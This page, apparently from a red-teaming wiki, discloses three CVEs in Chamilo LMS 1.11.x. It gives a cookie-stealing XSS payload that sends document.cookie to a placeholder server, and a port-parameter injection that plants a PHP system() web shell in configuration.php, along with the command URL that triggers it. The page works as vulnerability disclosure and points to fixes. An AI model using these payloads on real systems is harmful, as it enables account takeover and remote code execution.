Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • CVE-2021-37391 - From Stored XSS to account takeover
  • CVE-2021-37390 - Reflected XSS search mechanism
  • CVE-2021-37389 - From Stored XSS to PHP backdoor implantation
  • BONUS: Another XSS's

Was this helpful?

  1. CVE & Exploits / CTF
  2. CVEs

Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation

Set of vulnerabilities found on the Chamilo-lms-1.11.x version.

PreviousCHIYU IoT devicesNextCVE - Submission Guides

Last updated 3 years ago

Was this helpful?

- From Stored XSS to account takeover

Title: From Stored XSS to account takeover Vulnerability: Stored XSS CVE ID: CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N

A user without privileges in Chamilo LMS 1.11.x can send an invitation message to another user, e.g., the administrator, through main/social/search.php, main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on the administration side via a stored XSS vulnerability via social network the send invitation feature.

Proof-of-Concept

A guest user without privileges on the Chamilo LMS could send an invitation with a malicious message that could put at risk the administrator's privacy. Basically, it was possible to take advantage of a stored XSS vulnerability and stole the authentication token of another user - in this case, the administrator. This scenario could be abused to get access over the administrator account (takeover).

After that, click on "Send message" button.

On the admin side, the payload is executed by opening the invitations panel on the left menu.

By using a custom payload, it was possible to get the administrator's cookie and clone their session.

<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>

Impact: By using this vulnerability, an unprivileged user can steal cookies from an admin account or forcing the administrator to create an account with admin privileges with an HTTP 302 redirect.

A Chamilo LMS 1.11.14 reflected XSS vulnerability exists in main/social/search.php=q URI (social network search feature).

Impact: By using this vulnerability, an unprivileged user can steal cookies from an admin account or forcing the administrator to create an account with admin privileges with an HTTP 302 redirect.

Mitigation: Update the Chamilo to the latest version.

CVE-2021-37389 - From Stored XSS to PHP backdoor implantation

Chamilo 1.11.14 allows stored XSS via main/install/index.php and main/install/ajax.php through the port parameter.

As expected, the sent payload will be stored on the config.php file on the web-server. As this parameter was not validated in the right way, it could be abused to implant a PHP backdoor on the web-server by using the port parameter to inject the malicious payload presented below.

Target payload:

3306';echo system($_GET["cmd"]);
http://localhost/chamilo/app/config/configuration.php?cmd=id

BONUS: Another XSS's

During the installation process, a lot of fields are also vulnerable to stored XSS, namely:

  • Administrator login

  • Administrator first name

  • Administrator last name

  • Administrator email

  • Your personal name; and

  • Your company short name

As a result, the payloads are stored in the database and reflected on the website.

Impact: By using this vulnerability, an unprivileged user can steal cookies from an admin account or forcing the administrator to create an account with admin privileges with an HTTP 302 redirect.

In addition, the port parameter can be also used to implant a PHP backdoor on the web-server.

Mitigation: Update the Chamilo to the latest version.

Mitigation: Update the Chamilo to the latest version. Fix:

ExploitDB:

- Reflected XSS search mechanism

Title: Reflected XSS search mechanism Vulnerability: Reflected XSS CVE ID: CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Fix:

Title: From Stored XSS to PHP backdoor implantation Vulnerability: Stored XSS CVE ID: CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:H

The values will be written into your configuration file app/config/configuration.php

We got it

Fix:

😎
😎
https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8
https://www.exploit-db.com/exploits/50694
CVE-2021-37390
CVE-2021-37390
https://github.com/chamilo/chamilo-lms/commit/3fcc751d5cc7da311532a8756fba5a8778f50ca0
CVE-2021-37389
https://github.com/chamilo/chamilo-lms/commit/dfae49f5dc392c00cd43badcb3043db3a646ff0c
CVE-2021-37391
CVE-2021-37391
Security issues - Chamilo LMS - Chamilo Tracking System
Logo